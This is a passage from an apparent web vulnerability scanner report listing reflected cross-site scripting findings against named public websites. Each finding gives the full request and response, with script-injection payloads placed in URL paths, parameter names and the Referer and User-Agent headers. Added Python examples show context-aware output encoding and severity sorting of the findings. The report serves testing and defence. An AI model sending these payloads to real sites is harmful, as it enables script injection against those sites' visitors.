Because the data copied into the response arrives in a request header, the behaviour is not trivial to exploit against another user: an ordinary web page cannot set the User-Agent header of a victim's request to an arbitrary value. Client-side technologies such as Flash have in the past allowed a page to make a victim's browser send a request with attacker-chosen headers; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.347ac1--><script>alert(1)</script>189060c7204
Host: www.surveygizmo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:59:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Pingback: http://www.surveygizmo.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 01:59:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: www2=true; expires=Mon, 02-May-2011 01:59:24 GMT; path=/; domain=www.surveygizmo.com
Connection: close
Content-Length: 21239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- //
____ ______
/ __/_ _______ _____ __ __/
...[SNIP]...
<!-- curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.347ac1--><script>alert(1)</script>189060c7204 -->
...[SNIP]...
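
Findings 3.102 to 3.106 show the same header value landing in three different markup contexts: a double-quoted attribute value (3.102), a single- or double-quoted JavaScript string literal (3.103, 3.104) and an HTML comment (3.106), with a different breakout string for each. The following Python is an added example, not part of the XSS.CX report or any listed site's code. It reproduces the check the scanner performs (locate the random-prefix/suffix probe, decide what context it landed in, and whether it escaped that context) and then shows the context-specific output encoding that would have contained each of the three payloads. The probe strings are the ones recorded above; the surrounding markup is constructed to resemble the reflection points shown in those responses, and the context classifier is a heuristic, not an HTML5 tokenizer.

```python
import html
import re

# Scanner-style probe: random prefix + injection + random suffix, so the
# reflection can be located even when the injection itself is mangled.
# Injections are those recorded in findings 3.102, 3.103 and 3.106; the
# templates are constructed to resemble the reflection points shown there.
PROBES = {
    "attribute": ("71870", '"><script>alert(1)</script>', "affe0ff9b1e"),
    "js_string": ("89499", "</script><script>alert(1)</script>", "7862d696a08"),
    "comment":   ("47ac1", "--><script>alert(1)</script>", "189060c7204"),
}
TEMPLATES = {
    "attribute": '<input type="text" name="prev" value="http://www.google.com/search?hl=en&q={PROBE}" size="60">',
    "js_string": "<script>omni_refer('http://www.google.com/search?hl=en&q={PROBE}');</script>",
    "comment":   "<!-- curl/7.21.0 {PROBE} -->",
}


def _open_quote(text):
    """Quote character still open at the end of `text`, or None (no escape handling)."""
    current = None
    for ch in text:
        if current is None and ch in "\"'":
            current = ch
        elif ch == current:
            current = None
    return current


def classify_context(body, pos):
    """Heuristic markup context of offset `pos`, judged from the text before it.
    Script is checked first because '<!--' inside a script is script data."""
    before = body[:pos]
    low = before.lower()
    s_open = low.rfind("<script")
    if s_open != -1 and low.find("</script", s_open) == -1:
        quote = _open_quote(before[before.find(">", s_open) + 1:])
        return f"js_string({quote})" if quote else "js_code"
    c_open = before.rfind("<!--")
    if c_open != -1 and before.find("-->", c_open) == -1:
        return "comment"
    t_open = before.rfind("<")
    if t_open != -1 and before.find(">", t_open) == -1:
        quote = _open_quote(before[t_open:])
        return f"attribute({quote})" if quote else "attribute(unquoted)"
    return "text"


def find_probe(body, prefix, suffix):
    """(start, end) of the first prefix...suffix run in body, or None."""
    m = re.search(re.escape(prefix) + r".*?" + re.escape(suffix), body, re.S)
    return (m.start(), m.end()) if m else None


_JS_ESCAPES = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\n": "\\n", "\r": "\\r",
               "<": "\\u003c", ">": "\\u003e", "&": "\\u0026",
               "\u2028": "\\u2028", "\u2029": "\\u2029"}


def encode_for(context, value):
    """Context-appropriate output encoding for an untrusted value."""
    if context.startswith("js_string"):
        # Escaping quotes alone is not enough: '</script>' ends the script
        # element whatever the JS string state, so '<' and '>' must go too.
        return "".join(_JS_ESCAPES.get(ch, ch) for ch in value)
    if context.startswith("attribute"):
        return html.escape(value, quote=True)          # '"' -> &quot;
    # Comment and text: with '>' escaped, neither '-->' nor '--!>' can form.
    return html.escape(value, quote=False)


def assess(kind):
    """Reproduce the report's check for one reflection kind, then show the hardened output."""
    prefix, injection, suffix = PROBES[kind]
    template = TEMPLATES[kind]
    raw = template.replace("{PROBE}", prefix + injection + suffix)
    start, end = find_probe(raw, prefix, suffix)
    context = classify_context(raw, start)
    # The probe broke out if the context at its end differs from the one at its start.
    broke_out = classify_context(raw, end) != context
    safe = template.replace("{PROBE}", encode_for(context, prefix + injection + suffix))
    _, s_end = find_probe(safe, prefix, suffix)
    return {
        "context": context,
        "reflected_unmodified": injection in raw,
        "broke_out": broke_out,
        "safe_body": safe,
        "contained_after_encoding": classify_context(safe, s_end) == context,
    }


if __name__ == "__main__":
    for kind in PROBES:
        r = assess(kind)
        print(kind, r["context"], "broke_out:", r["broke_out"],
              "contained after encoding:", r["contained_after_encoding"])
        print("   ", r["safe_body"])
```

The point of `encode_for` is that the fix differs per context: `html.escape` is the right tool for the attribute and comment cases but does nothing for a JavaScript string, where the `</script>` sequence closes the element before the JS parser ever sees a quote, so `<` and `>` have to be turned into `\u003c` and `\u003e`.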

3.107. http://www.toysrus.com/server-status [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.toysrus.com
Path:   /server-status

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11f9e"><script>alert(1)</script>f8d422c9a51 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the data copied into the response arrives in a request header, the behaviour is not trivial to exploit against another user: an ordinary web page cannot set the Referer header of a victim's request to an arbitrary value. Client-side technologies such as Flash have in the past allowed a page to make a victim's browser send a request with attacker-chosen headers; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.toysrus.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: 11f9e"><script>alert(1)</script>f8d422c9a51

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:52:00 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=htQKNWPQMFy9hvvZYsryqWThQtT0pXQg0Klb8LlbWQn0h2v2MKhB!857638899; path=/
Set-Cookie: browser_id=123795184804; expires=Tuesday, 30-Mar-2021 02:52:00 GMT; path=/
Set-Cookie: browser_id=123795184804; expires=Tuesday, 30-Mar-2021 02:52:00 GMT; path=/
Set-Cookie: browser_id=123795184804; expires=Tuesday, 30-Mar-2021 02:52:00 GMT; path=/
Set-Cookie: browser_id=123795184804; expires=Tuesday, 30-Mar-2021 02:52:00 GMT; path=/
Set-Cookie: browser_id=123795184804; expires=Tuesday, 30-Mar-2021 02:52:00 GMT; path=/
Set-Cookie: browser_id=123795184804; expires=Tuesday, 30-Mar-2021 02:52:00 GMT; path=/
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 96034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1284386;type=trupa912;cat=truho083;u1=;u2=1;u3=;u4=2255956;u5=11f9e"><script>alert(1)</script>f8d422c9a51;ord=1;num=48926772?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

3.108. http://www.arstechnica.com/server-info [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arstechnica.com
Path:   /server-info

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a470d"><script>alert(1)</script>440d8db37ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /server-infoa470d"><script>alert(1)</script>440d8db37ab HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.arstechnica.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Location: http://arstechnica.com/server-infoa470d"><script>alert(1)</script>440d8db37ab
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 122
Server: Joost NRG/0.0.1
X-Powered-By: Rainbows and unicorns
Date: Sat, 02 Apr 2011 01:57:37 GMT
X-Varnish: 624032331
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

Redirecting to <a href="http://arstechnica.com/server-infoa470d"><script>alert(1)</script>440d8db37ab">arstechnica.com</a>

3.109. http://www.arstechnica.com/server-status [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arstechnica.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ec8d"><script>alert(1)</script>db2fe1c515d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /server-status2ec8d"><script>alert(1)</script>db2fe1c515d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.arstechnica.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Location: http://arstechnica.com/server-status2ec8d"><script>alert(1)</script>db2fe1c515d
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 124
Server: Joost NRG/0.0.1
X-Powered-By: Rainbows and unicorns
Date: Sat, 02 Apr 2011 02:32:44 GMT
X-Varnish: 127249974
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

Redirecting to <a href="http://arstechnica.com/server-status2ec8d"><script>alert(1)</script>db2fe1c515d">arstechnica.com</a>

3.110. http://www.azstarnet.com/server-status [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.azstarnet.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fe4e"style%3d"x%3aexpression(alert(1))"e47bcfef74 was submitted in the REST URL parameter 1. This input was echoed as 2fe4e"style="x:expression(alert(1))"e47bcfef74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to introduce JavaScript into the document. This technique is specific to Internet Explorer: CSS expressions were an IE extension and are not evaluated by IE8 and later in standards mode, so the PoC will not fire in other browsers or in current IE modes.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Note also that the response into which user data is copied is itself an HTTP redirection (a 301 carrying an X-Loop: 1 header, redirecting once more to the same payload-bearing path). Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /server-status2fe4e"style%3d"x%3aexpression(alert(1))"e47bcfef74 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.azstarnet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 301 Moved Permanently
Server: WWW
Cache-Control: public, max-age=300
Content-Type: text/html
Date: Sat, 02 Apr 2011 02:26:22 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
Location: http://azstarnet.com/server-status2fe4e"style="x:expression(alert(1))"e47bcfef74/
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: azstarnet.com
Content-Length: 638

<!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head><title>301 Moved Permanently</title></head><body>
<script type='text/javascript' src='http://stats.townnews.com/shared-content/stats/comm
...[SNIP]...
<a href="http://azstarnet.com/server-status2fe4e"style="x:expression(alert(1))"e47bcfef74/">
...[SNIP]...

3.111. http://www.officialpayments.com/server-status [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officialpayments.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b347"><script>alert(1)</script>98550e2cb77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /server-status6b347"><script>alert(1)</script>98550e2cb77 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.officialpayments.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 302 This object has moved
Content-type: text/html
Content-Length: 273
Location: https://www.officialpayments.com:443/server-status6b347"><script>alert(1)</script>98550e2cb77

<html><head><title>302 - This object has moved</title></head>
<body>
<h1>302: This object has moved</h1>
<b><p>Please click <A HREF="https://www.officialpayments.com:443/server-status6b347"><script>alert(1)</script>98550e2cb77">
...[SNIP]...

3.112. http://www.officialpayments.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officialpayments.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb26f"><script>alert(1)</script>627a97b11cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /server-status?fb26f"><script>alert(1)</script>627a97b11cd=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.officialpayments.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 302 This object has moved
Content-type: text/html
Content-Length: 276
Location: https://www.officialpayments.com:443/server-status?fb26f"><script>alert(1)</script>627a97b11cd=1

<html><head><title>302 - This object has moved</title></head>
<body>
<h1>302: This object has moved</h1>
<b><p>Please click <A HREF="https://www.officialpayments.com:443/server-status?fb26f"><script>alert(1)</script>627a97b11cd=1">
...[SNIP]...

3.113. http://www.tns-global.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tns-global.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24fc5"><script>alert(1)</script>54e2cbeaaa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /server-status?24fc5"><script>alert(1)</script>54e2cbeaaa3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tns-global.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 02:08:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.tnsglobal.com/server-status?24fc5"><script>alert(1)</script>54e2cbeaaa3=1
Content-Length: 270
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1><p>The document has moved <a href="http://www.tnsglobal.com/server-status?24fc5"><script>alert(1)</script>54e2cbeaaa3=1">
...[SNIP]...
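
Findings 3.108 to 3.113 are all rated Information rather than Low for the reason given in each: the payload is echoed only in the body of a 3xx response, which a browser does not render because it acts on the Location header instead. The Python below is an added example, not part of the XSS.CX report or any listed site's code. It applies that triage rule to raw HTTP responses of the kind pasted in this report, including a chain of responses as recorded under "Response (redirected)", and it separately flags a payload that lands in the Location header, since that is the input a header-injection (CRLF) probe should be retried against. The Low/Information mapping is my reading of the report's severity column, and the sample responses are constructed from the 3.108, 3.111 and 3.102 captures, trimmed to the headers that matter.

```python
# Added example: triage a reflected scanner payload the way this report's
# severity column does, from raw HTTP/1.x responses.

PAYLOAD = 'a470d"><script>alert(1)</script>440d8db37ab'

# Constructed from finding 3.108: payload in Location and in the 301 body.
REDIRECT_301 = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    f"Location: http://arstechnica.com/server-info{PAYLOAD}\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    f'Redirecting to <a href="http://arstechnica.com/server-info{PAYLOAD}">arstechnica.com</a>'
)
# Constructed from finding 3.111: HTTP/1.0 status line with a free-text reason.
REDIRECT_302 = (
    "HTTP/1.0 302 This object has moved\r\n"
    "Content-type: text/html\r\n"
    f"Location: https://www.officialpayments.com:443/server-status{PAYLOAD}\r\n"
    "\r\n"
    f'<b><p>Please click <A HREF="https://www.officialpayments.com:443/server-status{PAYLOAD}">'
)
# Constructed from finding 3.102: a rendered 404 page echoing the same payload.
RENDERED_404 = (
    "HTTP/1.1 404 Not Found\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    f'<input type="text" name="prev" value="http://www.google.com/search?q={PAYLOAD}" size="60">'
)


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status_code, headers, body).
    Header names are lower-cased; repeated headers are kept as a list."""
    sep = "\r\n\r\n" if "\r\n\r\n" in raw else "\n\n"
    head, _, body = raw.partition(sep)
    lines = head.splitlines()
    status = int(lines[0].split()[1])          # "HTTP/1.0 302 This object has moved" -> 302
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # first ':' only; URLs in Location keep theirs
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers, body


def triage(raw, payload):
    """Rate one response: 'Low' if the payload is reflected in a page the browser
    will render, 'Information' if it is only reflected in a 3xx redirect (body
    not rendered, Location acted upon), 'none' if it is not reflected at all."""
    status, headers, body = parse_response(raw)
    locations = headers.get("location", [])
    is_redirect = 300 <= status < 400 and bool(locations)
    in_body = payload in body
    in_location = any(payload in loc for loc in locations)
    if in_body and not is_redirect:
        severity = "Low"
    elif in_body or in_location:
        severity = "Information"
    else:
        severity = "none"
    return {
        "status": status,
        "is_redirect": is_redirect,
        "reflected_in_body": in_body,
        "reflected_in_location": in_location,
        # A value that reaches Location is a separate header-injection test:
        # retry it with a CRLF-bearing payload before closing the finding.
        "retest_for_header_injection": in_location,
        "severity": severity,
    }


def triage_chain(responses, payload):
    """Rate a redirect chain as the scanner records it ('Response (redirected)'):
    the finding takes the highest severity reached at any hop."""
    order = {"none": 0, "Information": 1, "Low": 2}
    hops = [triage(r, payload) for r in responses]
    best = max(hops, key=lambda h: order[h["severity"]])
    return best["severity"], hops


if __name__ == "__main__":
    for name, raw in [("301", REDIRECT_301), ("302", REDIRECT_302), ("404", RENDERED_404)]:
        print(name, triage(raw, PAYLOAD))
    # A 301 that is followed to a rendered page echoing the payload is Low overall,
    # which is the 3.107/3.110 "redirection occurred" situation.
    print("chain:", triage_chain([REDIRECT_301, RENDERED_404], PAYLOAD)[0])
```

The chain case is the one to keep in mind when reading the "Note that a redirection occurred" paragraphs: a reflection inside a redirect body is only Information on its own, but if the browser follows the Location and the destination page also echoes the value, the finding is rated on that destination, not on the hop.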
